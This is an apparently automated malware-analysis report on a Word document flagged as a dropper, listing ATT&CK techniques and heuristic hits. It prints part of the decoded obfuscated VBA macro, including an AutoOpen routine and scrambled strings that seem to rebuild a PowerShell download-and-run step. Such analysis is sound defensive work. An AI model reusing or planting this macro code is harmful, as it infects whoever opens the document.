Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Word document containing a legacy WordBasic AutoOpen macro. A 'Shell()' call flagged as critical indicates that the macro is designed to execute arbitrary commands. This is further supported by the ClamAV detection name 'Doc.Dropper.Agent-6549967-0', which suggests dropper functionality. The macro most likely downloads and executes a second-stage payload.
Heuristics (6):

- ClamAV: Doc.Dropper.Agent-6549967-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6549967-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 163047 bytes |

SHA-256: 58e2a1532be3f7f489a82b6ff68c885fc8c9814fbb64c4c2f0388480d7c0d343

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "fAudaNQtwjAN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GNvKzs(RjDZO)
LDJYZo = KqwEK
JkESUB = (wpGfz / NVzqQO / 43957 / Fix(iZDTI)) + 30411 - CLng(WPRrzS + CLng(66330)) + NOiYz + 59457 * zdbvb - CStr(73279) / zjpoH / CLng(LAwLlW)
End Sub
Sub apozLi(kchqZ)
JcZsNo = JQkCL
DFMPX = (bCvIpd / whcXzw / 28345 / Fix(ViaGw)) + 95027 - CLng(SJEmm + CLng(2612)) + wXNKDw + 80958 * UkPdr - CStr(52276) / slDwvh / CLng(lJYpN)
lDDriV = EKovQY
OqrUG = (lRSjpF / cmDlOk / 11452 / Fix(QhXvVs)) + 53915 - CLng(wHjXZI + CLng(90164)) + DjbwU + 71191 * BccGS - CStr(12218) / jjShw / CLng(TZktJ)
VbJiUU = lifIHG
NWTslJ = (tbAErK / ziwhom / 28896 / Fix(ruImaU)) + 40343 - CLng(XKaSw + CLng(92772)) + rIAFc + 79 * dcJGm - CStr(7077) / bTTQUf / CLng(kwiHY)
End Sub
Sub ctQro(YHZoj)
shQjcU = RVvrGC
QhHJRw = (ahjLS / jfZBf / 75803 / Fix(bwIDWO)) + 49259 - CLng(EhCKp + CLng(24120)) + rzPWij + 35111 * jVKDw - CStr(72865) / tLTYAR / CLng(DnDYv)
zhBdE = oZmIFu
wbiLK = (VInqqQ / USwcT / 18413 / Fix(vAzUhw)) + 1458 - CLng(WHDOir + CLng(36915)) + VbszaO + 24343 * KMtcWd - CStr(17930) / vHNwcO / CLng(MaYlfn)
End Sub
Sub Autoopen()
On Error Resume Next
mUBUbB = MMhnIJ
FXbtw = (SXiUV / wfWCc / 63728 / Fix(iZZbB)) + 4305 - CLng(NjufL + CLng(37720)) + KHCws + 63597 * JPpjz - CStr(39028) / vpKFG / CLng(bujwa)
BdavSDEhcBK (qAjdwJ + WFlMvSYinoOukk + CmYTF)
AiYKju = hCRtj
EOdPaG = (BqYam / WwRTXV / 9490 / Fix(GaCkw)) + 2357 - CLng(Ioipt + CLng(47763)) + mZWzN + 67229 * JFwYsX - CStr(5620) / juYiE / CLng(nafiFz)
End Sub
Sub CpksRS(swZIV)
wUDLDd = sEnRO
GzwrT = (koHQO / aFrXmV / 30013 / Fix(QBTXT)) + 50211 - CLng(cAzCSd + CLng(94854)) + MuFFA + 71143 * pEofdX - CStr(58461) / SSCGE / CLng(fbXtf)
oKOvC = uidhQP
QMOio = (EzifjQ / tGjSi / 22742 / Fix(cKfqt)) + 56294 - CLng(czskBm + CLng(66582)) + rRsiwa + 21073 * iifik - CStr(75798) / KwEuvF / CLng(XpLzcw)
uidoFP = azPuR
AMNwO = (Bimzsn / KtDXww / 24332 / Fix(kvBqf)) + 46613 - CLng(kzpAiE + CLng(64134)) + bMimz + 7212 * kkBXF - CStr(40489) / cQvEd / CLng(QMIjR)
End Sub
Sub wnIsJ(cicKQM)
TcLQo = TONWY
ZbRuO = (zVfFV / rsucmu / 33402 / Fix(jpJoF)) + 92114 - CLng(cwDkQ + CLng(68425)) + jCLoNG + 32430 * jOGjYw - CStr(24819) / cTFYVk / CLng(dpSkW)
End Sub
Attribute VB_Name = "cUFsDJsQwj"
Sub jsFvh(XXPHa)
KLSzk = zuVtTH
BqUmUZ = (muodfW / SvNHQB / 6742 / Fix(hlJHiw)) + 73819 - CLng(pYwBfj + CLng(4672)) + uhwiQW + 78671 * OmjwH - CStr(73599) / FqHIj / CLng(MrfAEz)
End Sub
Function WFlMvSYinoOukk()
On Error Resume Next
jVQmt = MiEZiL
ptwSnh = (UsKYX / HipRi / 22395 / Fix(jntVu)) + 10352 - CLng(ZUBRcz + CLng(75322)) + SuNMWw + 70379 * KrPaVi - CStr(86181) / uSoMCA / CLng(YiCdzq)
hzrSN = Tkswf
JAARj = (aMGOLF / wwSnw / 40024 / Fix(NUoopN)) + 19229 - CLng(uQJzDk + CLng(95406)) + WilFw + 39760 * SlmzR - CStr(48806) / wtirG / CLng(MLbTjw)
PRsEDz = YLKzT("pFl'eilwe6+we6Cbwe6+we6eWwe6+we6.we6+we6twe6+we6'+'eN.we6+we6mwe6+we6ewe'+'6+we6tsyS )qxotcejbo-we6+we6qx'+'owe6+we6+we6+we6qxowqwe6+we6xowe6'+'+we6+qxowe6+we6enqwe6+w'+'e6xwe6+we6o(we6+we6. we6+weLvr", 44165 + 4 - 44165, 44165 + 194 - 44165)
qFOCi = fwJNPq
CVDDNs = (uTQTL / JELDSY / 96757 / Fix(bNWjR)) + 35188 - CLng(DnfOBN + CLng(72793)) + HXFnwW + 44395 * vrDpbl - CStr(10658) / qspbIj / CLng(waJqj)
KDkICS = PnwWb
OvHrEJ = (sFjGwi / aHIQTQ / 13099 / Fix(ooqzPh)) + 56813 - CLng(hFBdK + CLng(38755)) + VPcfiE + 38432 * LYlsIf - CStr(64828) / LTbGT / CLng(GtwPh)
iHnWfrObq = YLKzT("mdomewe6+we6twe6+we6I-ewe6+we6qxo+qxokwe6+we6qxowe6+we6+we6+we6XZsiT", 70509 + 6 - 70509, 70509 + 61 - 70509)
AvAWG = nArlX
UJiZdp = (tzDpK / NaUJij / 37569 / Fix(RdPXP)) + 73544 - CLng(rjKZvr + CLng(73785)) + WhQIu + 76224 * wFqmt - CStr(74220) / rJEEM / CLng(fOBND)
ZJoMD = iDMSvB
GMuDj = (hiTcOZ / HVjMDi / 59098 / Fix(EhFLI)) + 88735 - CLng(mjwWD + CLng(77395)) + QaCzA + 11926 * FhamY - CStr(79692) / TzONX / CLng(Ciosaj)
zSSII
```

... (truncated)